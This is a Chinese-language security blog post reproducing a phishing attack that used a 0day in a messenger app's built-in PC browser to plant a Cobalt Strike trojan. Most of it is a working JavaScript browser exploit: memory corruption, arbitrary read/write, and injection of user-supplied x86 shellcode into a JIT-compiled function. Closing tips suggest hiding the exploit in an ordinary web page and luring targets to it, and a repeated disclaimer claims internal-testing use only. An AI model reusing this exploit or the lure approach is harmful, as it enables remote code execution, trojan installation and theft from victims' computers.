某信默认自带浏览器存在0day钓鱼复现

  • A+
所属分类:安全文章

开局一张图




通过大佬分析,此次攻击复现主要过程如下:

1、 攻击者利用某信(PC版)0day构造恶意的钓鱼链接,通过信将钓鱼链接发送给目标受害者。

2、 当目标受害者通过某信打开攻击者的钓鱼链接时,将触发该漏洞。从而导致目标受害者PC被植入CS木马,木马进程为:**soft.exe,并创建了名为dotnet_v4.3的系统服务。

3、 随后,攻击者即可进一步进行敏感信息的窃取。


一、主要的JS脚本如下:

ENABLE_LOG = true;IN_WORKER = true;
// run calc and hang in a loopvar shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的
function print(data) {}

var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});
for (var i = 0; i < 0x10000; ++i) { target_function(i);}

var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;
function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}
function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}
function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null;
this.page_buffer = null; this.page_view = null;
this.prevent_opt = [];
var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf;
class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } }
this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer);
new RegExp({ toString: function () { return 'a' } }); cb(true);
class DerivedBase extends RegExp { constructor() { // var array = null; super( // at this point, the 4-byte allocation for the JSRegExp `this` object // has just happened. { toString: cb }, 'g' // now the runtime JSRegExp constructor is called, corrupting the // JSArray. );
// this allocation will now directly follow the FixedArray allocation // made for `this.data`, which is where `array.elements` points to. this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } }
// try{ var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; }
class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } }
return DerivedN; })`);
gc();

new (derived_n(tDerivedNDepth))();
this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); }
this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); }
this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); }
this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); }
this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); }
this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}
function trigger() { var oob = oobAccess();
var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16));
var kCodeInsOffset = 0x1b;
var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16));
oob.setBytes(code_addr, shellcode);
target_function(0);}
try{ print("start running"); trigger();}catch(e){ print(e);}

二、html调用JS


这里这是一个例子,详细的可以扩展一下思路。

比如:隐藏在正常的网页里?


三、诱导


然后就有可开头的那张图

声明:

    本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

    本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

    本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。


扫码二维码

获取更多精彩

洛米唯熊

本文始发于微信公众号(洛米唯熊):某信默认自带浏览器存在0day钓鱼复现

发表评论